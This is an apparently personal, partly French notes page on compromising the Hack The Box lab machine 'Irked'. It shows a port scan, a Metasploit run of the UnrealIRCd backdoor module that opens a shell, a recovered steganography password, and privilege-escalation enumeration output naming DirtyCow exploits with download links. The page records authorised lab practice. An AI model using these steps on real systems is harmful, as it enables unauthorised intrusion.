challenges:hackthebox:machines:irked
HTB ~~ Machines ~~ Irked
Pistes :
- * ssher ircd depuis vm aws pour que ce soit + pratique (pousser clé depuis exploit)
- * reprendre les infos de base et chercher point par point, à tête reposée
- * stegano avec le password dans le .backup et l'image du site web
EDIT : la piste du .backup + stegano était bonne pour own le user, utiliser ça pour ssh ensuite
10.10.10.117 / Irked PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 111/tcp open rpcbind syn-ack ttl 63 6697/tcp open ircs-u syn-ack ttl 63 8067/tcp open infi-async syn-ack ttl 63 49608/tcp open unknown syn-ack ttl 63 65534/tcp open unknown syn-ack ttl 63
-
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit -z
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.15.18:42033 -> 10.10.10.117:4444) at 2019-02-17 14:12:00 +0000
[*] Session 1 created in the background.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) >
-
/home/ircd/Unreal3.2 ls .. CVE-2014-5207_fuse_suid_3.16.1 CVE-2014-5207_fuse_suid_3.16.1.1 CVE-2014-5207_fuse_suid_3.16.1.c test
-
.bash_history cat ../djmardov/Documents/.backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
-
Available information:
Kernel version: 3.16.0
Architecture: i686
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
36 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 7
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 7
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
-
[-] Kernel information: Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux [-] Kernel information (continued): Linux version 3.16.0-6-686-pae (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
-
Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )
-
python privesc.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.16.0-6-686-pae (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb8u1) ) #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08)
[+] Hostname
irked
[+] Operating System
Debian GNU/Linux 8 \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:f4:41
inet addr:10.10.10.117 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:f441/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feb9:f441/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1156590 errors:19 dropped:49 overruns:0 frame:0
TX packets:1062708 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:154870380 (147.6 MiB) TX bytes:285260521 (272.0 MiB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:29 errors:0 dropped:0 overruns:0 frame:0
TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3221 (3.1 KiB) TX bytes:3221 (3.1 KiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:65534 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 7118/python
tcp 0 0 0.0.0.0:8067 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 654/ircd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:54578 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.117:32909 10.10.15.88:9001 ESTABLISHED 7195/bash
tcp 0 0 10.10.10.117:50190 10.10.12.129:4444 ESTABLISHED 4472/telnet
tcp 0 0 10.10.10.117:22 10.10.15.73:46050 ESTABLISHED -
tcp 0 0 10.10.10.117:41183 10.10.13.47:4444 ESTABLISHED 12776/telnet
tcp 0 0 10.10.10.117:36162 10.10.15.209:4444 ESTABLISHED 12753/telnet
tcp 0 0 10.10.10.117:41169 10.10.13.47:4444 ESTABLISHED 7674/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:56986 ESTABLISHED 7214/sleep
tcp 0 0 10.10.10.117:43237 10.10.15.88:1153 ESTABLISHED 7183/telnet
tcp 0 0 10.10.10.117:34149 10.10.14.175:4444 ESTABLISHED 13249/telnet
tcp 0 0 10.10.10.117:36170 10.10.15.209:4444 ESTABLISHED 12805/telnet
tcp 0 0 10.10.10.117:22 10.10.13.217:59880 ESTABLISHED -
tcp 0 0 10.10.10.117:22 10.10.13.27:43730 ESTABLISHED -
tcp 0 0 10.10.10.117:50757 10.10.15.31:7191 ESTABLISHED 7539/telnet
tcp 0 0 10.10.10.117:36773 10.10.15.198:8888 ESTABLISHED 11944/sh
tcp 0 0 10.10.10.117:44029 10.10.12.40:4444 ESTABLISHED 7667/perl
tcp 34 0 10.10.10.117:6697 10.10.12.23:56966 CLOSE_WAIT 6312/sh
tcp 0 0 10.10.10.117:36163 10.10.15.209:4444 ESTABLISHED 12755/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:56924 ESTABLISHED 2859/sh
tcp 0 0 10.10.10.117:22 10.10.14.218:37699 ESTABLISHED -
tcp 0 0 10.10.10.117:22 10.10.14.218:56078 ESTABLISHED -
tcp 0 0 10.10.10.117:35943 10.10.15.144:4444 ESTABLISHED 8027/telnet
tcp 0 0 10.10.10.117:51719 10.10.12.227:4444 ESTABLISHED 2860/telnet
tcp 0 0 10.10.10.117:41920 10.10.13.59:4444 ESTABLISHED 7217/telnet
tcp 0 0 10.10.10.117:22 10.10.13.27:43872 ESTABLISHED -
tcp 0 0 10.10.10.117:35944 10.10.15.144:4444 ESTABLISHED 8025/telnet
tcp 0 0 10.10.10.117:41921 10.10.13.59:4444 ESTABLISHED 7215/telnet
tcp 0 0 10.10.10.117:35954 10.10.15.144:4444 ESTABLISHED 12764/perl
tcp 0 0 10.10.10.117:50260 10.10.12.129:4444 ESTABLISHED 13285/telnet
tcp 0 0 10.10.10.117:44034 10.10.12.40:4444 ESTABLISHED 8097/perl
tcp 33 0 10.10.10.117:6697 10.10.12.23:57004 ESTABLISHED 7578/sleep
tcp 0 0 10.10.10.117:45553 10.10.12.83:4444 CLOSE_WAIT 1044/perl
tcp 0 0 10.10.10.117:22 10.10.13.27:43766 ESTABLISHED -
tcp 0 0 10.10.10.117:50261 10.10.12.129:4444 ESTABLISHED 13287/telnet
tcp 34 0 10.10.10.117:6697 10.10.12.23:56948 CLOSE_WAIT 4471/sh
tcp 0 0 10.10.10.117:34148 10.10.14.175:4444 ESTABLISHED 13251/telnet
tcp 0 0 10.10.10.117:47491 10.10.15.198:4444 ESTABLISHED 11922/telnet
tcp 0 0 10.10.10.117:47490 10.10.15.198:4444 ESTABLISHED 11920/telnet
tcp 33 0 10.10.10.117:6697 10.10.12.23:57030 ESTABLISHED 12802/sleep
tcp 0 0 10.10.10.117:52666 10.10.13.27:4444 ESTABLISHED 6392/telnet
tcp 0 0 10.10.10.117:50756 10.10.15.31:7191 ESTABLISHED 7537/telnet
tcp 0 0 10.10.10.117:41182 10.10.13.47:4444 ESTABLISHED 12774/telnet
tcp 0 0 10.10.10.117:42367 10.10.15.31:4433 ESTABLISHED 7546/MtGtX
tcp 0 0 10.10.10.117:41168 10.10.13.47:4444 ESTABLISHED 7672/telnet
tcp 0 1 10.10.10.117:38562 1.2.3.4:7029 SYN_SENT 654/ircd
tcp 0 0 10.10.10.117:36169 10.10.15.209:4444 ESTABLISHED 12803/telnet
tcp 0 0 10.10.10.117:55729 10.10.15.88:19577 ESTABLISHED 6357/telnet
tcp6 0 0 :::48051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 445 10.10.10.117:80 10.10.13.36:60380 ESTABLISHED -
tcp6 0 511 10.10.10.117:80 10.10.13.36:60386 ESTABLISHED -
tcp6 0 453 10.10.10.117:80 10.10.14.52:40388 ESTABLISHED -
tcp6 1 0 ::1:53211 ::1:631 CLOSE_WAIT -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:636 0.0.0.0:* -
udp 0 0 0.0.0.0:33413 0.0.0.0:* -
udp 0 0 127.0.0.1:646 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:1900 0.0.0.0:* -
udp 0 0 0.0.0.0:45088 0.0.0.0:* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::636 :::* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::52008 :::* -
udp6 0 0 :::50226 :::* -
[+] Route
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=216704,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=414384k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=23,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=1001,gid=1001)
tmpfs on /run/user/118 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=118,gid=125)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=207192k,mode=700,uid=1000,gid=1000)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
fuse_suid on /home/ircd/test type fuse.fuse_suid (rw,nosuid,nodev,relatime,user_id=1001,group_id=1001)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=85e17c08-fee3-451a-a1f8-c95346ddc46c / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=29d1ae3e-562d-4323-b58c-2d48799f9632 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 7 2015 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rw-r--r-- 1 root root 244 Dec 28 2014 anacron
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.daily:
total 84
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 311 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 625 Mar 31 2018 apache2
-rwxr-xr-x 1 root root 15000 Dec 11 2016 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 384 Oct 5 2014 cracklib-runtime
-rwxr-xr-x 1 root root 1597 May 2 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 10 2018 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 Nov 19 2015 passwd
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 24
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 May 11 2018 .
drwxr-xr-x 135 root root 12288 Oct 30 14:51 ..
-rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
09:16:41 up 2:36, 5 users, load average: 0.10, 0.08, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
djmardov pts/0 10.10.13.27 06:41 1:18m 0.90s 0.90s -bash
djmardov pts/2 10.10.13.27 06:58 1:23m 0.17s 0.17s -bash
djmardov pts/15 10.10.14.218 08:48 20:28 0.17s 0.06s sshd: djmardov [priv]
djmardov pts/17 10.10.13.217 08:53 7:28 0.29s 0.29s -bash
[+] Super Users Found:
root
[+] Environment
MAIL=/var/mail/ircd
USER=ircd
HOME=/home/ircd
LOGNAME=ircd
XDG_SESSION_ID=c1
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/home/ircd/Unreal3.2
[+] Root and current user history (depends on privs)
-rw------- 1 ircd ircd 333 May 15 2018 /home/ircd/.bash_history
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
geoclue:x:110:119::/var/lib/geoclue:/bin/false
pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
saned:x:115:124::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh
[+] Current User
ircd
[+] Current User ID
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 8 root root 4096 Mar 24 06:45 /var/tmp
drwxrwxrwt 16 root root 4096 Mar 24 09:16 /tmp
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Mar 24 06:40 /tmp/.font-unix
drwxrwxrwt 5 root root 120 Mar 24 06:40 /run/lock
drwxrwxrwt 2 root root 40 Mar 24 06:40 /dev/mqueue
drwxrwxrwt 2 root root 120 Mar 24 06:40 /dev/shm
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
-rwxrwxrwx 1 ircd ircd 25305 Mar 24 07:52 /tmp/privesc.py
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
-rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwxr-sr-x 1 root utmp 13992 Jun 23 2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
-rwxr-sr-x 1 root utmp 13992 Dec 5 2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
drwxrwsr-t 2 root lpadmin 4096 Jul 23 2017 /usr/share/ppd/custom
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
drwxrwsr-x 10 root staff 4096 May 11 2018 /usr/local
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/include
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/etc
drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib
drwxrwsr-x 4 root staff 4096 May 11 2018 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/lib/python3.4
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/lib/python3.4/dist-packages
drwxrwsr-x 8 root staff 4096 May 11 2018 /usr/local/share
drwxrwsr-x 6 root staff 4096 May 11 2018 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/man
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/ca-certificates
drwxrwsr-x 3 root staff 4096 May 11 2018 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/emacs/site-lisp
drwxrwsr-x 7 root staff 4096 May 11 2018 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/share/fonts
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/bin
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/games
drwxrwsr-x 2 root staff 4096 May 11 2018 /usr/local/src
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/chatscripts
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/ppp/peers
drwxr-sr-x 29 man root 4096 Mar 24 06:50 /var/cache/man
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ro
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sk
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/hr
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/el
drwxr-sr-x 2 man root 4096 Mar 24 06:50 /var/cache/man/da
drwxrwsr-x 2 root mail 4096 May 11 2018 /var/mail
drwxr-s--- 2 Debian-exim adm 4096 Mar 24 06:45 /var/log/exim4
drwxrwsr-x 2 root staff 4096 Jan 9 2017 /var/local
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxr-sr-x 3 root systemd-journal 60 Mar 24 06:40 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 Mar 24 06:40 /run/log/journal/58827ab6b7d24c318344087f9268b9b5
